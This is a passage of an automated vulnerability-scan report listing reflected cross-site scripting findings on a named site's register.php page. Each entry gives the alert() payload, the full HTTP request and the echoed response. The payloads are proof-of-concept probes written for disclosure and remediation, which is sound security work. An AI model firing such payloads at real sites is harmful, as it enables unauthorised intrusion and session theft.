<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/650c9"><script>alert(1)</script>9f248f4ee0a/_js/mootools.v1.11.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.81. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4206"-alert(1)-"913e1c1e16b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cf4206"-alert(1)-"913e1c1e16b/_js/mootools.v1.11.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:03:26 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<f4206"-alert(1)-"913e1c1e16b/_js/mootools.v1.11.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.82. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f2bc9%3balert(1)//bd29a3501f5 was submitted in the REST URL parameter 2. This input was echoed as f2bc9;alert(1)//bd29a3501f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cf2bc9%3balert(1)//bd29a3501f5/_js/mootools.v1.11.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:04:59 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<f2bc9;alert(1)//bd29a3501f5/_js/mootools.v1.11.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.83. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49768"-alert(1)-"8b0c87240d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js49768"-alert(1)-"8b0c87240d3/mootools.v1.11.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:07:54 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js49768"-alert(1)-"8b0c87240d3/mootools.v1.11.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.84. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a3b1f%3balert(1)//5f017ecd6f6 was submitted in the REST URL parameter 3. This input was echoed as a3b1f;alert(1)//5f017ecd6f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_jsa3b1f%3balert(1)//5f017ecd6f6/mootools.v1.11.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:08:53 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_jsa3b1f;alert(1)//5f017ecd6f6/mootools.v1.11.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.85. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6cc6"-alert(1)-"1e47b38900 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.jsd6cc6"-alert(1)-"1e47b38900 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:12:54 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/mootools.v1.11.jsd6cc6"-alert(1)-"1e47b38900?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.86. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 975b1%3balert(1)//04ecf96ce96 was submitted in the REST URL parameter 4. This input was echoed as 975b1;alert(1)//04ecf96ce96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js975b1%3balert(1)//04ecf96ce96 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:14:25 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/mootools.v1.11.js975b1;alert(1)//04ecf96ce96?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.87. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 147a0%3balert(1)//485c1224fde was submitted in the REST URL parameter 2. This input was echoed as 147a0;alert(1)//485c1224fde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C147a0%3balert(1)//485c1224fde/_js/rc_lang_en.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:08:36 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<147a0;alert(1)//485c1224fde/_js/rc_lang_en.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.88. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49508"-alert(1)-"ce67ad602e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C49508"-alert(1)-"ce67ad602e0/_js/rc_lang_en.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:08:17 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<49508"-alert(1)-"ce67ad602e0/_js/rc_lang_en.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.89. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e99de"><script>alert(1)</script>f6fa0c6c1d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/e99de"><script>alert(1)</script>f6fa0c6c1d0/_js/rc_lang_en.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:02:05 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/e99de"><script>alert(1)</script>f6fa0c6c1d0/_js/rc_lang_en.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.90. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c1a64%3balert(1)//1b6fe37197 was submitted in the REST URL parameter 3. This input was echoed as c1a64;alert(1)//1b6fe37197 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_jsc1a64%3balert(1)//1b6fe37197/rc_lang_en.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:14:55 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_jsc1a64;alert(1)//1b6fe37197/rc_lang_en.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.91. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20c90"-alert(1)-"b132f8d09a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js20c90"-alert(1)-"b132f8d09a2/rc_lang_en.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:12:57 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js20c90"-alert(1)-"b132f8d09a2/rc_lang_en.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.92. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8926f"-alert(1)-"f19aa2bac8f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js8926f"-alert(1)-"f19aa2bac8f HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:16:36 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/rc_lang_en.js8926f"-alert(1)-"f19aa2bac8f?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.93. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 249f6%3balert(1)//3e8150a178d was submitted in the REST URL parameter 4. This input was echoed as 249f6;alert(1)//3e8150a178d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js249f6%3balert(1)//3e8150a178d HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
